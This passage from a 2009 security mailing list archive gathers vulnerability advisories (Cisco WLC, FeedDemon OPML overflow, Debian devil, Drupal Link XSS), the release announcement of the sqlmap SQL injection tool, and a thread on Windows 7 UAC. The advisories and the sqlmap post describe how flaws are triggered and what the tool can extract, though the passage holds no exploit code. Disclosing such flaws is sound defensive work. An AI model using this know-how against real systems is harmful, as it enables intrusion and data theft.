impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss * Certain packets may cause WebAuth services to hang or reload the device (CSCsq44516) CVSS Base Score - 6.1 Access Vector - Adjacent Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 5.0 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * Crash handling invalid post for webauth (CSCsq44516) CVSS Base Score - 6.1 Access Vector - Adjacent Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 5.0 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * WLC TSEC driver may hang or crash the device (CSCso60979) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * Local Management Users may obtain full admin rights (CSCsv62283) CVSS Base Score - 9.0 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.8 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the denial of service vulnerabilities may cause the affected device to hang or reload. Repeated exploitation could result in a sustained DoS condition. The privilege escalation vulnerability may allow an authenticated user to obtain full administrative rights on the affected system. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. +-----------------------------------------------------+ | Vulnerability | Affected | First | Recommended | | / Bug ID | Release | Fixed | Release | | | | Version | | |---------------+----------+------------+-------------| | | 4.1 | Migrate to | 4.2.176.0 | | | | 4.2 | | | |----------+------------+-------------| | | 4.2 | 4.2.173.0 | 4.2.176.0 | | |----------+------------+-------------| | | 5.0 | Migrate to | 5.2.157.0 | | CSCsq44516 | | 5.2 | | | |----------+------------+-------------| | | 5.1 | Contact | Contact TAC | | | | TAC | | | |----------+------------+-------------| | | 5.2 | Not | Not | | | | vulnerable | Vulnerable | |---------------+----------+------------+-------------| | | 4.1 | Migrate to | 4.2.176.0 | | | | 4.2 | | | |----------+------------+-------------| | | 4.2 | 4.2.112.0 | 4.2.176.0 | | |----------+------------+-------------| | CSCsm82364 | 5.0 | Not | Not | | | | vulnerable | vulnerable | | |----------+------------+-------------| | | 5.1 | Not | Not | | | | vulnerable | vulnerable | | |----------+------------+-------------| | | 5.2 | 5.2.157.0 | 5.2.157.0 | |---------------+----------+------------+-------------| | | 4.1 | Migrate to | 4.2.176.0 | | | | 4.2 | | | |----------+------------+-------------| | | 4.2 | 4.2.117.0 | 4.2.176.0 | | |----------+------------+-------------| | | 5.0 | Migrate to | 5.2.157.0 | | CSCso60979 | | 5.2 | | | |----------+------------+-------------| | | 5.1 | Not | Not | | | | vulnerable | vulnerable | | |----------+------------+-------------| | | 5.2 | Not | Not | | | | vulnerable | vulnerable | |---------------+----------+------------+-------------| | | 4.1 | Not | Not | | | | vulnerable | vulnerable | | |----------+------------+-------------| | | 4.2 | 4.2.174.0 | 4.2.176.0 | | |----------+------------+-------------| | | 5.0 | Not | Not | | CSCsv62283 | | Vulnerable | Vulnerable | | |----------+------------+-------------| | | 5.1 | Not | Not | | | | Vulnerable | vulnerable | | |----------+------------+-------------| | | 5.2 | Not | Not | | | | Vulnerable | vulnerable | +-----------------------------------------------------+ Note: Customers running 4.1M WLC mesh code, using Cisco Wireless 1510 Access Points (APs) are recommended to migrate to release 4.2.176.0. Customers running 4.1 mesh code, using Cisco Wireless 1520 APs are recommended to migrate to 5.2 or later. Workarounds =========== There are no workarounds for any of these vulnerabilities. Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt at cisco.com or security-alert at cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac at cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were found during internal testing and during the resolution of customer support cases. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20090204-wlc.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce at cisco.com * first-bulletins at lists.first.org * bugtraq at securityfocus.com * vulnwatch at vulnwatch.org * cisco at spot.colorado.edu * cisco-nsp at puck.nether.net * full-disclosure at lists.grok.org.uk * comp.dcom.sys.cisco at newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +------------------------------------------------------------+ | Revision 1.0 | 2009-February-04 | Initial public release. | +------------------------------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2008 - 2009 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- Updated: Feb 04, 2009 Document ID: 108336 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkmJxSEACgkQ86n/Gc8U/uB4XQCfadDoSJbA5K+0GujUY02Rj1Ua xnUAn0nc+bNHTzHwD298ai3ZW/JWKWaU =waFY -----END PGP SIGNATURE----- From svrt at bkav.com.vn Thu Feb 5 08:15:45 2009 From: svrt at bkav.com.vn (SVRT-Bkis) Date: Thu, 5 Feb 2009 15:15:45 +0700 Subject: [Full-disclosure] [SVRT-02-09] FeedDemon (ver<=2.7) Buffer Overflow Vulnerability Message-ID: <165EA4DFAAC8415F91F3C2B7A1AB810C@minhbqPC> Title : FeedDemon Buffer OverFlow Vulnerability 1. General Information FeedDemon is known as the most popular Windows RSS Reader which allows users to view and manage easily RSS feeds from their desktop. In January 2009, SVRT-BKIS detected a buffer overflow vulnerability in this software. Taking advantage of this flaw, hackers can perform remote attacks, install viruses, steal private information, and even take control of users' systems. We have sent the alert to the manufacturer. Details : http://security.bkis.vn/?p=329 SVRT Advisory : SVRT-02-09 Initial vendor notification : 01-21-2009 Release Date : 02-05-2009 Update Date : 02-05-2009 Discovered by : Le Nhat Minh (SVRT-Bkis) Security Rating : Critical Impact : Remote Code Execution Affected Software : FeedDemon (version <= 2.7) 2. Technical Description The vulnerability was found in the processing of OPML (Outline Processor Markup Language) file, which is an XML format for outlines used by RSS reader to store and manage RSS feeds. With OPML, users can easily share their RSS feed lists with others or export these lists to use in other RSS feed readers. However, FeedDemon does not handle this format well enough, which leads to buffer overflow flaw. More precisely, the error occurs when users import an OPML file, whose "outline" tag has a too long "text" attribute. FeedDemon, on parsing this file, will crash; and if malicious code is embedded into that file, it will be executed and give hackers system control. Exploitation can be carried out via a file stored on victims' computers or simply a link to such file. It is this factor that increases the threat of users' computers being attack remotely. Taking advantage of the above vulnerability, a hacker might prepare a malicious OPML file, and somehow trick users into importing it. He/she might send the file to users directly or send them a link to that file instead. Right after users have imported the file, malicious code will be executed and they will become hacker's victims. 3. Solution Rating this vulnerability high severity, and due to the fact that the manufacturer hasn't released any official patch for it. Bkis recommends that users of FeedDemon should be careful when importing RSS feed lists from untrustworthy sources. ------------------------------------------------------------------------------------------------------------------------ About SVRT-Bkis : SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols and embedded systems. About Bkis : Bkis is Vietnamese leading Center in researching, deploying network security software and solutions. From bernardo.damele at gmail.com Wed Feb 4 16:59:05 2009 From: bernardo.damele at gmail.com (Bernardo Damele A. G.) Date: Wed, 4 Feb 2009 16:59:05 +0000 Subject: [Full-disclosure] [Tool] sqlmap 0.6.4 released Message-ID: Hi, I am glad to release sqlmap version 0.6.4. Introduction ============ sqlmap is an open source command-line automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more. Changes ======= Some of the new features include: * Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object. * Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology. * Major speed increase in DBMS basic fingerprint. * Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle. * Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable. Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog. Download ======== You can download it in various formats: * Source gzip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.4.tar.gz * Source bzip2 compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.4.tar.bz2 * Source zip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.4.zip * DEB binary package, http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.4-1_all.deb * RPM binary package, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.4-1.noarch.rpm * Portable executable for Windows that does not require the Python interpreter to be installed on the operating system, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.4_exe.zip Documentation ============= * sqlmap user's manual: http://sqlmap.sourceforge.net/doc/README.pdf * sqlmap developer's documentation: http://sqlmap.sourceforge.net/dev/ Happy hacking! -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F From devin at debian.org Thu Feb 5 06:30:23 2009 From: devin at debian.org (Devin Carraway) Date: Thu, 05 Feb 2009 06:30:23 +0000 Subject: [Full-disclosure] [SECURITY] [DSA 1717-1] New devil packages fix buffer overflow Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1717 security at debian.org http://www.debian.org/security/ Steffen Joeris February 05, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : devil Vulnerability : buffer overflow Problem type : local (remote) Debian-specific: no CVE Id : CVE-2008-5262 Debian Bugs : 511844 512122 Stefan Cornelius discovered a buffer overflow in devil, a cross-platform image loading and manipulation toolkit, which could be triggered via a crafted Radiance RGBE file. This could potentially lead to the execution of arbitrary code. For the stable distribution (etch), this problem has been fixed in version 1.6.7-5+etch1. For the testing distribution (lenny), this problem has been fixed in version 1.6.8-rc2-3+lenny1. For the unstable distribution (sid), this problem has been fixed in version 1.7.5-4. We recommend that you upgrade your devil package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/d/devil/devil_1.6.7-5+etch1.dsc Size/MD5 checksum: 784 00a9a200619160d990ed2a2deeb4238d http://security.debian.org/pool/updates/main/d/devil/devil_1.6.7-5+etch1.diff.gz Size/MD5 checksum: 8379 414a516d9fef38921dbd538d78adcac0 http://security.debian.org/pool/updates/main/d/devil/devil_1.6.7.orig.tar.gz Size/MD5 checksum: 3013312 0d0c3842196d85c4e24bedabcd84f626 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/d/devil/libdevil1c2_1.6.7-5+etch1_alpha.deb Size/MD5 checksum: 372974 ee2e6a0b9c8df07f1824762d551e042a http://security.debian.org/pool/updates/main/d/devil/libdevil-dev_1.6.7-5+etch1_alpha.deb Size/MD5 checksum: 477468 51486ac6ff1b4cd5e7240f310873a7b4 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/d/devil/libdevil-dev_1.6.7-5+etch1_amd64.deb Size/MD5 checksum: 320946 7a851f7411b600951c6f933008b514c9 http://security.debian.org/pool/updates/main/d/devil/libdevil1c2_1.6.7-5+etch1_amd64.deb Size/MD5 checksum: 271718 0a202d4d921a1a00a82b3f6f9976e1b6 arm architecture (ARM) http://security.debian.org/pool/updates/main/d/devil/libdevil-dev_1.6.7-5+etch1_arm.deb Size/MD5 checksum: 297386 fb284b115a2d299e59facbfa903130aa http://security.debian.org/pool/updates/main/d/devil/libdevil1c2_1.6.7-5+etch1_arm.deb Size/MD5 checksum: 264932 39a535af14195508964c9ca1775c3132 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/d/devil/libdevil-dev_1.6.7-5+etch1_hppa.deb Size/MD5 checksum: 410562 e34d8590f7c2e05d6cf02a118c211655 http://security.debian.org/pool/updates/main/d/devil/libdevil1c2_1.6.7-5+etch1_hppa.deb Size/MD5 checksum: 347448 d21505b2fde524a40ee31f0efa12970a i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/d/devil/libdevil1c2_1.6.7-5+etch1_i386.deb Size/MD5 checksum: 252798 aca0fc8776489aba07f6a6a103fb52f9 http://security.debian.org/pool/updates/main/d/devil/libdevil-dev_1.6.7-5+etch1_i386.deb Size/MD5 checksum: 286098 1f1bfc9efdd189ea5b430a50ca281cca ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/d/devil/libdevil1c2_1.6.7-5+etch1_ia64.deb Size/MD5 checksum: 481276 ad48301776addd355e4ffa46374c84d7 http://security.debian.org/pool/updates/main/d/devil/libdevil-dev_1.6.7-5+etch1_ia64.deb Size/MD5 checksum: 552778 bd8f6164f68262a7cce113ca541660ef mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/d/devil/libdevil-dev_1.6.7-5+etch1_mips.deb Size/MD5 checksum: 377338 0ce969cf88ed85d64c03211eb2268794 http://security.debian.org/pool/updates/main/d/devil/libdevil1c2_1.6.7-5+etch1_mips.deb Size/MD5 checksum: 301428 8c80a1520fe67db9f79ebcb12570bebc mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/d/devil/libdevil-dev_1.6.7-5+etch1_mipsel.deb Size/MD5 checksum: 376332 4c9b8f756eabdd857d9a17d6a74f9b1c http://security.debian.org/pool/updates/main/d/devil/libdevil1c2_1.6.7-5+etch1_mipsel.deb Size/MD5 checksum: 302362 ae2dd9e16b1ef239ce1779e16bb89d3e powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/d/devil/libdevil-dev_1.6.7-5+etch1_powerpc.deb Size/MD5 checksum: 368536 e3b1f038afadaffb44ac17a78cb57f15 http://security.debian.org/pool/updates/main/d/devil/libdevil1c2_1.6.7-5+etch1_powerpc.deb Size/MD5 checksum: 294498 129bc064f6920f5847a539b42e262e2f s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/d/devil/libdevil-dev_1.6.7-5+etch1_s390.deb Size/MD5 checksum: 310166 a4e8bfb5603d45fe62e678ac8b2affb8 http://security.debian.org/pool/updates/main/d/devil/libdevil1c2_1.6.7-5+etch1_s390.deb Size/MD5 checksum: 290248 fc76306188733c38b307662e3105cc70 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/d/devil/libdevil1c2_1.6.7-5+etch1_sparc.deb Size/MD5 checksum: 276480 1387371202c1c4d72288ba07db4dc20b http://security.debian.org/pool/updates/main/d/devil/libdevil-dev_1.6.7-5+etch1_sparc.deb Size/MD5 checksum: 329950 50da6f88bfeec78c9a98173a5e254730 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJioaBU5XKDemr/NIRAsvpAJ44uPpouFwWwBEDTGoOzjJKo2Y2ZACfTbol QkJNVTQddwN9C3M684KUrLc= =xIc0 -----END PGP SIGNATURE----- From andros at sas.upenn.edu Thu Feb 5 17:51:59 2009 From: andros at sas.upenn.edu (Andrew Rosborough) Date: Thu, 05 Feb 2009 12:51:59 -0500 Subject: [Full-disclosure] Drupal Link Module XSS Vulnerability Message-ID: <498B273F.4090202@sas.upenn.edu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Drupal Link Module XSS Vulnerability Security Risk: Moderately Critical Exploitable: Remotely Vulnerabilities: Cross Site Scripting Discovered by: Andrew Rosborough, Justin C. Klein Keane Tested: Link 5.x-2.5 on Drupal 5.10 Description Drupal (http://drupal.org) is a robust content management system (CMS) that provides extensibility through hundreds of third party modules. While the security of Drupal core modules is vetted by a central security team(http://drupal.org/security), third party modules are not reviewed for security. The Link module (http://drupal.org/project/link) is a module that extends the Drupal CCK (Content Creation Kit) module (http://www.drupal.org/project/cck) by allowing users to add links to their content types. Cross Site Scripting (XSS) Vulnerability The Link module contains a XSS vulnerability in the 'Help' field. Any user with rights to administer content types can edit a content type that contains a link field or create a content type that contains an link field. In the 'Widget settings' fieldset presented during configuration of the specific image field a textarea labeled 'Help text:' is presented. Arbitrary script can be entered into this text area and it is not escaped. This vulnerability is especially dangerous because the script executes whenever a user creates new content of the type with the XSS infected help text. This potentially exposes site administrators to the XSS attack. - -- Andrew Rosborough Information Security and Unix Systems University of Pennsylvania School of Arts and Sciences -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iEYEARECAAYFAkmLJz4ACgkQeHiaLtUKG3wVzACffCUYBVO8HEtJHq8dx5sLpqQI As4AniXKhWADtlUa/yjKUTIpcVigLe4m =tNFi -----END PGP SIGNATURE----- From Thierry at Zoller.lu Thu Feb 5 17:51:19 2009 From: Thierry at Zoller.lu (Thierry Zoller) Date: Thu, 5 Feb 2009 18:51:19 +0100 Subject: [Full-disclosure] Nokia N95-8 browser denial of service In-Reply-To: <200902050601.n1561kh8011869@www3.securityfocus.com> References: <200902050601.n1561kh8011869@www3.securityfocus.com> Message-ID: <1582554652.20090205185119@Zoller.lu> Hi, Also crashes Firefox 3.06 (latest), Stack overflow. (to not be confused with stack buffer overflow) Thu Feb 5 18:46:13.828 2009 (GMT+1): (15d8.17ec): Stack overflow - code c00000fd (first chance) eax=077e4b80 ebx=00000000 ecx=077e4b60 edx=00000000 esi=00000000 edi=077e4b60 eip=604fcc8f esp=00032fa0 ebp=0003304c iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 Crash seems not to be recorded by the FF crash handled. Regards, Thierry -- http://secdev.zoller.lu Thierry Zoller From vigilantgregorius at gmail.com Thu Feb 5 18:52:48 2009 From: vigilantgregorius at gmail.com (Miller Grey) Date: Thu, 5 Feb 2009 12:52:48 -0600 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> Message-ID: ...what? On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr. wrote: > Windows says: Hello world! Check this out, world, this is really cool. > Now I have, uh, something like, uh, "privileges management"! > > > > "UAC" is no more than a new commercial designation for something with > about 40 years. > And they (Redmond) are still missing the concept's point. > > > > > > > On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard > wrote: > >> The biggest issue here is that although it's technically easy to fix > >> this problem (just have UAC issue an alert when somebody's messing with > >> the system settings), it involves doing more of what end users dislike > >> most about UAC (it issuing alerts to Joe Sixpack all the time when he > >> does something bone-headed security-wise). > >> > >> Fixing this one in a way that users will put up with will be a bitch. > > > > Why not just have it not prompt if you are changing settings, except for > UAC settings? that would be the simple way around it > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > -- > Marcio Barbado, Jr. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090205/05ca2e71/attachment.html From kevin at tux.appstate.edu Thu Feb 5 19:32:15 2009 From: kevin at tux.appstate.edu (Kevin Wilcox) Date: Thu, 5 Feb 2009 14:32:15 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> Message-ID: <5d6848b00902051132r23f2a48h5f1287da1b8a4560@mail.gmail.com> 2009/2/5 Miller Grey : > On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr. wrote: >> Windows says: Hello world! Check this out, world, this is really cool. >> Now I have, uh, something like, uh, "privileges management"! >> "UAC" is no more than a new commercial designation for something with >> about 40 years. >> And they (Redmond) are still missing the concept's point. > ...what? He's saying Microsoft has embraced and extended "privilege management" and "introduced" it as something new, "UAC". He then says Microsoft is daft and missing the entire point of privilege management, even though it's been around for decades and their "UAC" is nothing new. Make sense? kmw -- Far better is it to dare mighty things, to win glorious triumphs, even if chequered by failure, than to take rank with those poor spirits who neither enjoy much nor suffer much, because they live in the grey twilight that knows not victory or defeat. From Valdis.Kletnieks at vt.edu Thu Feb 5 19:38:40 2009 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Thu, 05 Feb 2009 14:38:40 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: Your message of "Thu, 05 Feb 2009 14:17:32 EST." References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> Message-ID: <26698.1233862720@turing-police.cc.vt.edu> On Thu, 05 Feb 2009 14:17:32 EST, Jimmy Astle said: > It all comes back to windows biggest issue, joe the plumber > shouldn't not be running as a local admin on his box. UAC problem solved! I > still dont see how redmond missed the concept. It's *easy* to see how Redmond missed it - they *intentionally* missed it. You have to keep in mind that as a corporation, Redmond doesn't *really* give a flying f**k in a rolling donut about your computer's security - they care about their profits. We all (including the Redmond guys) know that we could drastically reduce the number of infections by making people run as non-admin and making it damned inconvenient to install possibly untrusted software. But if you care about your profits, you ignore the 4,986 geeks who won't run it because it's a total security mess, and sell it to the 193,472,415 Joe Sixpacks out there, and sell it in a config that lets Joe install any damned thing, because Joe wants his dancing hamster screensaver. In other words, they'll fix the security problems *only* when they get so bad that even Joe Sixpack (and his corporate counterpart Joe "ya want fries with that" McSE) start insisting that Something Be Done. And even then, they'll only do as much as it takes to maximize the profits (you tighten it too much, and you get double-whammied - tightening more costs more *and* loses you sales). -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090205/a01dcb4e/attachment.bin From marcio.barbado at gmail.com Thu Feb 5 19:56:44 2009 From: marcio.barbado at gmail.com (M.B.Jr.) Date: Thu, 5 Feb 2009 17:56:44 -0200 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> Message-ID: <2df3b0cb0902051156k7ec72531ie862ebed0466ddf6@mail.gmail.com> Dear Jimmy, you say you can't see how they missed the "privileges management" point. You need to study UNIX. Notwithstanding, being somewhat benevolent with you, just study SELinux. Maybe you see sth, then. Regards, On Thu, Feb 5, 2009 at 5:17 PM, Jimmy Astle wrote: > I am new to the list so hello to everyone..... > > Now for the Windows 7 UAC stuff. > > 1.) Its beta.... its not going to be perfect wait for RC1 before selling 7 > down the river. > 2.) > http://www.informationweek.com/news/security/app-security/showArticle.jhtml?articleID=213001021&subSection=News > > It all comes back to windows biggest issue, joe the plumber > shouldn't not be running as a local admin on his box. UAC problem solved! I > still dont see how redmond missed the concept. > > > > On Thu, Feb 5, 2009 at 1:52 PM, Miller Grey > wrote: >> >> ...what? >> >> On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr. wrote: >>> >>> Windows says: Hello world! Check this out, world, this is really cool. >>> Now I have, uh, something like, uh, "privileges management"! >>> >>> >>> >>> "UAC" is no more than a new commercial designation for something with >>> about 40 years. >>> And they (Redmond) are still missing the concept's point. >>> >>> >>> >>> >>> >>> >>> On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard >>> wrote: >>> >> The biggest issue here is that although it's technically easy to fix >>> >> this problem (just have UAC issue an alert when somebody's messing >>> >> with >>> >> the system settings), it involves doing more of what end users dislike >>> >> most about UAC (it issuing alerts to Joe Sixpack all the time when he >>> >> does something bone-headed security-wise). >>> >> >>> >> Fixing this one in a way that users will put up with will be a bitch. >>> > >>> > Why not just have it not prompt if you are changing settings, except >>> > for UAC settings? that would be the simple way around it >>> > >>> > _______________________________________________ >>> > Full-Disclosure - We believe in it. >>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> > Hosted and sponsored by Secunia - http://secunia.com/ >>> > >>> >>> >>> >>> -- >>> Marcio Barbado, Jr. >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > -- Marcio Barbado, Jr. From vigilantgregorius at gmail.com Thu Feb 5 20:23:15 2009 From: vigilantgregorius at gmail.com (Miller Grey) Date: Thu, 5 Feb 2009 14:23:15 -0600 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <5d6848b00902051132r23f2a48h5f1287da1b8a4560@mail.gmail.com> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> <5d6848b00902051132r23f2a48h5f1287da1b8a4560@mail.gmail.com> Message-ID: No, it doesn't make 